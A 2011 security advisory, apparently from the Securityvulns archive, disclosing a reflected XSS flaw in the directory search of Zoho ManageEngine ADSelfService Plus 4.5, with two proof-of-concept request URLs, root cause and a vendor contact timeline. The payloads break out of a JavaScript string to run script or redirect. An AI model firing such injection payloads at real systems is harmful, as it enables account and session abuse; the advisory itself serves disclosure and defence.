Cross-Site Scripting Vuln in Zoho ManageEngine ADSelfServicePlus

2011-11-21T00:00:00
ID SECURITYVULNS:DOC:27322
Type securityvulns
Reporter Securityvulns
Modified 2011-11-21T00:00:00

Description

Vulnerability ID: VRPTH-2011-001 Reference: http://jameswebb.me/vulns/vrpth-2011-001.txt

Vulnerability Summary

Non-persistent XSS in Zoho ManageEngine ADSelfService Plus

Test Environment

Windows 2008RC2 fully patched. ManageEngine ADSelfServicePlus version 4.5 Build 4521 installed. Integrated Into TestDomain

Technical Details

Corporate Directory Search feature in ManageEngine ADSelfServicePlus version 4.5 Build 4521 is susceptible to non-persistent XSS attacks. These vulnerabilities are manifest by the ability for attacker to terminate javascript variable declarations, escape encapsulation, and append arbitrary javascript code. ADSelfService Plus is a password management application for Active Directory environments.

Proof of Concept

Double-Quote String Termination HTTP Request = https://serverip:port/EmployeeSearch.cc?searchType=contains&searchBy=ALL_FIELDS&searchString=";alert("XSS");//\"

Response Source View <script language="javascript"> var searchValue = "';alert(XSS)//\"";

Single-Quote String Termination Similarly... HTTP Request= https://serverip:port/EmployeeSearch.cc?searchType=';document.location="http://www.cnn.com";//\"&searchBy=ALL_FIELDS&searchString=Bob

Root Cause Analysis

Input is not being escaped/filtered prior to javascript variable assignment

Fix/Work Around

Not aware of patch/fix. Contact Vendor.

Coordination History

09/28/11 - Contacted AdSelfServicePro Team with Vuln. Details 10/07/11 - Requested Update 10/08/11 - Received Response: Advised issues will be handled in future release. 10/27/11 - Requested Update:  Inquired if newer posted builds fixed issue 11/03/11 - Received Response: Newer build did not address; Indicated still researching.. 11/17/11 - Released Advisory